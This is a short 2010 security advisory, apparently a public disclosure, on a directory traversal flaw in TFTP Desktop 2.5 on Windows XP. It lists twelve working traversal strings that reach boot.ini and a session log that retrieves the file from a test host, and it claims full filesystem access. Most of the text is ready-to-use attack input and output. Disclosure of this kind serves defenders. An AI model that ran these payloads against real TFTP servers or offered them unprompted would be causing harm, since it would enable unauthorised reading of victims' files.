+------------------------------------------------------------------------+
| .......|
| ..''xxxxxxxxxxxxxxx'...|
|..'xxxxxxxxxxxxxxxxxxxxxxxxxxx..|
| ..'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx'. |
| .'xxxxxxxxxxxxxxxxxxxxxxxxxxxx'''.......'. |
| .'xxxxxxxxxxxxxxxxxxxxx''........... |
|.xxxxxxxxxxxxxxxxxx'... .........'. |
| 'xxxxxxxxxxxxxxx'......'.|
|'xxxxxxxxxxxxxx'..'x...x. |
| .xxxxxxxxxxxx'...'..... .' |
| 'xxxxxxxxx'......x.|
| xxxxxxx'...x.|
| xxxx'.....xx.|
| 'x'....'xxxxxxx'. x .x.|
| .x'. .'xxxxxxxxxxxxxx. '' .' |
|.xx..'xxxxxxxxxxxxxxxx. .'xx'''..'|
| .xx..'xxxxxxxxxxxxxxxx'.'xxxxxxxxx''.|
|.'xx'..'xxxxxxxxxxxxxxx...'xxxxxxxxxxxx'|
|.xxx'..xxxxxxxxxxxx'..'xxxxxxxxxxxxxx'. |
|.xxxx'.'xxxxxxxxx'.xxx'xxxxxxxxxx'. |
|.'xxxxxxx'.......xxxxxxx'.|
| ..'xxxxx'.. ..xxxxx'.. |
|....'xx'.....''''...|
||
|CubilFelino Security Research Labs|
|proudly presents... |
+------------------------------------------------------------------------+
Author: chr1x (chr1x@sectester.net)
Date: August 30, 2010
Affected operating system/software, including full version details
TFTP Desktop version 2.5, Tested on Windows XP PRO SP3
Download:
http://www.mynet2.com/soft/Software%20Archive/TFTP%20Server/tftp_desktop_free.exe
How the vulnerability can be reproduced
Attack strings below:
[*] Testing Path: .../.../.../boot.ini<- Vulnerable string!!
[*] Testing Path: .../.../.../.../boot.ini<- Vulnerable string!!
[*] Testing Path: .../.../.../.../.../boot.ini<- Vulnerable string!!
[*] Testing Path: .../.../.../.../.../.../boot.ini<- Vulnerable string!!
[*] Testing Path: .../.../.../.../.../.../.../boot.ini<- Vulnerable string!!
[*] Testing Path: .../.../.../.../.../.../.../.../boot.ini<- Vulnerable string!!
[*] Testing Path: ...\...\...\boot.ini<- Vulnerable string!!
[*] Testing Path: ...\...\...\...\boot.ini<- Vulnerable string!!
[*] Testing Path: ...\...\...\...\...\boot.ini<- Vulnerable string!!
[*] Testing Path: ...\...\...\...\...\...\boot.ini<- Vulnerable string!!
[*] Testing Path: ...\...\...\...\...\...\...\boot.ini<- Vulnerable string!!
[*] Testing Path: ...\...\...\...\...\...\...\...\boot.ini<- Vulnerable string!!
Confirmation log:
root@olovely:/# tftp
tftp> connect
(to) 192.168.1.53
tftp> ascii
tftp> get
(files) .../.../.../.../.../.../boot.ini
Received 211 bytes in 0.0 seconds
tftp> quit
What impact the vulnerability has on the vulnerable system
* High, since when exploiting the vulnerability the attacker is able to get full access to the victim filesystem.